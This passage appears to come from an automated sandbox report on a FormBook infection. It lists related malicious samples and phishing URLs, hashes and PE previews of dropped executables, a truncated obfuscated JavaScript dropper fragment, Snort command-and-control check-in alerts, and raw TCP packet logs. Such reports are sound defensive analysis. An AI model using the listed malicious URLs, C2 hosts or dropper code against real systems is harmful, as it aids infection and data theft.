                                                                        Order specification.exeGet hashmaliciousBrowse
                                                                        • 198.50.252.64
                                                                        Product List Pdf.exeGet hashmaliciousBrowse
                                                                        • 213.186.33.5
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 5.135.247.111
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 5.135.247.111
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 5.135.247.111
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 5.135.247.111
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 5.135.247.111
                                                                        https://bit.ly/3CVqxbaGet hashmaliciousBrowse
                                                                        • 158.69.52.117
                                                                        ubuntu-22.10-desktop-amd64.iso.torrentGet hashmaliciousBrowse
                                                                        • 188.165.229.87
                                                                        Fd6atEum7x.elfGet hashmaliciousBrowse
                                                                        • 149.60.1.92
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 51.210.137.6
                                                                        fV7AkeQRo5.elfGet hashmaliciousBrowse
                                                                        • 91.121.106.163
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 51.255.34.118
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 51.68.190.80
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 51.68.190.80

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        37f463bf4616ecd445d4a1937da06e19https://1drv.ms/w/s!Ak7psWnXktOUbpS5SvTskZcJZMEGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        https://qha4c.app.link/xtg1RqDrPwbGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        https://1drv.ms/w/s!Au8rnhmq1l5ZfHjnhpQ700s_UP0Get hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        https://explore-foliosociety.com/4EQH-1H9GJ-7WM5TM-1AWIZQ-1/c.aspxGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        Fct63d79.msiGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        Requested PO ___ .htmGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        SC_TR11670000.exeGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        scan_2023748984785874774.exeGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        BookingDetails77#6276.exeGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        cargo_manifest_3432-67383-733.exeGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        #Ud83d#Udd0aAudio-Mesage Transcription.HtML.htmLGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        https://www.google.com/url?q=https://script.google.com/macros/s/AKfycbzM_yOymOPYchWgWLzEuacoAGupl5BjLFzJz3f2tw-iRoxvi2cxifVfC3q4axRhdPM3/exec?q5erdwyd&sa=D&source=docs&ust=1674899009939775&usg=AOvVaw0g89hrD8M7bB_E-BkBqs_ZGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        RlqmqtGmmo.exeGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        rzIzm68n2l.exeGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        sdkfgnasfnjdg.exeGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        https://arbikinis.com.mx/wp-includes/images/redi.phpGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        Voice Call Transmitter.htmlGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        https://karl-jaspers-gesellschaft.de/Get hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        4567876tyu.htmlGet hashmaliciousBrowse
                                                                        • 91.227.138.48

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\winner.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\winner.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):226
                                                                        Entropy (8bit):5.3467126928258955
                                                                        Encrypted:false
                                                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                                        MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                                        SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                                        SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                                        SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\winner[1].exe

                                                                        Download File
                                                                        Process:C:\Windows\System32\wscript.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):619008
                                                                        Entropy (8bit):7.942180801026179
                                                                        Encrypted:false
                                                                        SSDEEP:12288:Fq9i2SvYr3DzQpRqubbdC5QIF/QydtyvscBJeEZLI1kdKKbF7u3fkhJYAP:A9HzHE+mCzQydV6EF4aU
                                                                        MD5:A9C03263C6DD4A1B672955A5ECADC1FF
                                                                        SHA1:01E2477F49E9916866469E2117E77D55AA613B89
                                                                        SHA-256:FB53D9D52D8BB79D32983A428E7B7067952818CEE896209C8C08C8DE93DE7680
                                                                        SHA-512:4320605E2D21E5A972FCF922C08474653F8A76965DC29704247B83453EA753844E3DB7891E451C2EA8F9A6FD1405B96C8F79A0A95D821EF64791B584563257BA
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 34%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)|f..................N... .......l... ........@.. ....................................@.................................@l..K....................................k............................................... ............... ..H............text....L... ...N.................. ..`.sdata...............R..............@....rsrc................T..............@..@.reloc...............p..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\334Fi60EZ

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\ipconfig.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):94208
                                                                        Entropy (8bit):1.287139506398081
                                                                        Encrypted:false
                                                                        SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                        MD5:292F98D765C8712910776C89ADDE2311
                                                                        SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                        SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                        SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\winner.exe

                                                                        Download File
                                                                        Process:C:\Windows\System32\wscript.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):619008
                                                                        Entropy (8bit):7.942180801026179
                                                                        Encrypted:false
                                                                        SSDEEP:12288:Fq9i2SvYr3DzQpRqubbdC5QIF/QydtyvscBJeEZLI1kdKKbF7u3fkhJYAP:A9HzHE+mCzQydV6EF4aU
                                                                        MD5:A9C03263C6DD4A1B672955A5ECADC1FF
                                                                        SHA1:01E2477F49E9916866469E2117E77D55AA613B89
                                                                        SHA-256:FB53D9D52D8BB79D32983A428E7B7067952818CEE896209C8C08C8DE93DE7680
                                                                        SHA-512:4320605E2D21E5A972FCF922C08474653F8A76965DC29704247B83453EA753844E3DB7891E451C2EA8F9A6FD1405B96C8F79A0A95D821EF64791B584563257BA
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 34%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)|f..................N... .......l... ........@.. ....................................@.................................@l..K....................................k............................................... ............... ..H............text....L... ...N.................. ..`.sdata...............R..............@....rsrc................T..............@..@.reloc...............p..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:ASCII text, with very long lines (9343), with no line terminators
                                                                        Entropy (8bit):5.467587351705753
                                                                        TrID:
                                                                          File name:0900664 MOHS Tender..js
                                                                          File size:9343
                                                                          MD5:a83afa6f04c636145ba81c1ae4fb0b09
                                                                          SHA1:a229f1ae98501e9fb00097986b3e76a910c97903
                                                                          SHA256:15232283ec281be6d000c6f5286007413363ec3fcb108642e49791a953540de1
                                                                          SHA512:b09058b7faef4a9508e14fe3068f8cc0d620d4fe4e9a2234b4f9707e5fe63f25b018de39df4e2e7fc458c7c572046f961b72f0bc416cb7eee3d8d0a1f4131d73
                                                                          SSDEEP:192:fXSWtooXv9eMcrwMJZoJUSFwI8zp1U7Yx2ip43VUxaL9AHACh3bALnzOFKaT:PSWaSv95KRJZoJUZtiXSRDh3UyFPT
                                                                          TLSH:B512A75866D428D4175B8BDA2327B5C9D85E48A77E854C0BF200FC842996B33CEE6F72
                                                                          File Content Preview:function _0x33f1(){var _0x237372=['jjEhYu','WOGynK1UEIHeaCoZd8ogza','3rnQ','tCk1WPiAW7/dOb3dQG','MSXML2.XMLHTTP','ASkCW6DM','WQpdJaNdUSkw','3080NCsyfc','E0RdL8o3lfldQcTd','cz*B','W5ZdI13cMmk4B2fiW4xdTW','bmo7FSkWWRb9cuhdOSk3','pAZheY','length','h0H+WOxcJb

                                                                          File Icon

                                                                          Icon Hash:e8d69ece968a9ec4

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          192.168.2.514.128.47.12649707802031412 01/30/23-13:39:50.282718TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970780192.168.2.514.128.47.126
                                                                          192.168.2.514.128.47.12649743802031449 01/30/23-13:42:32.091612TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.514.128.47.126
                                                                          192.168.2.514.128.47.12649707802031449 01/30/23-13:39:50.282718TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970780192.168.2.514.128.47.126
                                                                          192.168.2.5208.91.197.9149712802031449 01/30/23-13:40:11.394536TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971280192.168.2.5208.91.197.91
                                                                          192.168.2.514.128.47.12649743802031412 01/30/23-13:42:32.091612TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.514.128.47.126
                                                                          192.168.2.523.227.38.7449720802031412 01/30/23-13:40:51.433517TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.523.227.38.74
                                                                          192.168.2.5199.192.28.12149724802031453 01/30/23-13:41:08.676759TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.5199.192.28.121
                                                                          192.168.2.514.128.47.12649707802031453 01/30/23-13:39:50.282718TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970780192.168.2.514.128.47.126
                                                                          192.168.2.523.227.38.7449720802031453 01/30/23-13:40:51.433517TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.523.227.38.74
                                                                          192.168.2.5199.192.28.12149724802031449 01/30/23-13:41:08.676759TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.5199.192.28.121
                                                                          192.168.2.587.236.16.15349742802031449 01/30/23-13:42:25.723154TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.587.236.16.153
                                                                          192.168.2.523.227.38.7449720802031449 01/30/23-13:40:51.433517TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.523.227.38.74
                                                                          192.168.2.5199.192.28.12149724802031412 01/30/23-13:41:08.676759TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.5199.192.28.121
                                                                          192.168.2.514.128.47.12649743802031453 01/30/23-13:42:32.091612TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.514.128.47.126
                                                                          192.168.2.5208.91.197.9149712802031412 01/30/23-13:40:11.394536TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971280192.168.2.5208.91.197.91
                                                                          192.168.2.566.96.162.14949715802031449 01/30/23-13:40:21.675069TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.566.96.162.149
                                                                          192.168.2.587.236.16.15349742802031412 01/30/23-13:42:25.723154TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.587.236.16.153
                                                                          192.168.2.566.96.162.14949715802031412 01/30/23-13:40:21.675069TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.566.96.162.149
                                                                          192.168.2.5208.91.197.9149712802031453 01/30/23-13:40:11.394536TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971280192.168.2.5208.91.197.91
                                                                          192.168.2.566.96.162.14949715802031453 01/30/23-13:40:21.675069TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.566.96.162.149
                                                                          192.168.2.587.236.16.15349742802031453 01/30/23-13:42:25.723154TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.587.236.16.153

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 30, 2023 13:39:16.612190008 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:16.612268925 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:16.612387896 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:16.620214939 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:16.620261908 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:16.711195946 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:16.711424112 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.020385981 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.020430088 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.021286011 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.021392107 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.024014950 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.024034023 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.121289015 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.121340036 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.121380091 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.121413946 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.121432066 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.121474028 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.155843019 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.155982971 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.157891989 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.157941103 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.158056021 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.188915968 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.189038038 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.189133883 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.189593077 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.190409899 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.190525055 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.190542936 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.190620899 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.190859079 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.190953970 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.191107988 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.191191912 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.191200018 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.191211939 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.191258907 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.222867012 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.223005056 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.223009109 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.223033905 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.223119974 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.223119974 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.224026918 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.224137068 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.224258900 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.224340916 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.224400043 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.224468946 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.224677086 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.224750996 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.225167036 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.225274086 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.225405931 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.225557089 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.227075100 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.227075100 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.227075100 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.227075100 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.227108002 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.227299929 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.257010937 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.257169008 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.257196903 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.257260084 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.257287979 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.257304907 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.257337093 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.257364988 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.257463932 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.257549047 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.257671118 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.257755995 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.257832050 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.258284092 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.258426905 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.259771109 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.275198936 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.275243044 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.275243044 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.275243044 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.275243044 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.275470972 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.276014090 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.276161909 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.276189089 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.276287079 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.276309013 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.276489019 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.276571989 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.276593924 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.276657104 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.276673079 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.276688099 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.276696920 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.276745081 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.276765108 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.276789904 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.276858091 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.276896000 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.276969910 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.277004957 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.277074099 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.277102947 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.277188063 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.277204037 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.277273893 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.277296066 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.277365923 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.277381897 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.277477980 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.277493000 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.277513027 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.277570963 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.277602911 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346103907 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346205950 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346267939 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346277952 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346308947 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346335888 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346349001 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346375942 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346385002 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346409082 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346429110 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346458912 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346467972 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346482038 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346497059 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346510887 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346518993 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346549034 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346553087 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346579075 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346585989 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346609116 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346637011 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346648932 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346661091 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346714973 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346741915 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346802950 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346815109 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346843004 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346875906 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346884966 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346900940 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346926928 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346954107 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346966028 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346976995 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347027063 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347033024 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347044945 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347089052 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347111940 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347119093 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347131014 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347172976 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347197056 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347278118 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347280025 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347291946 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347342968 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347357035 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347369909 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347398043 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347399950 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347429991 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347440958 CET4434970391.227.138.48192.168.2.5
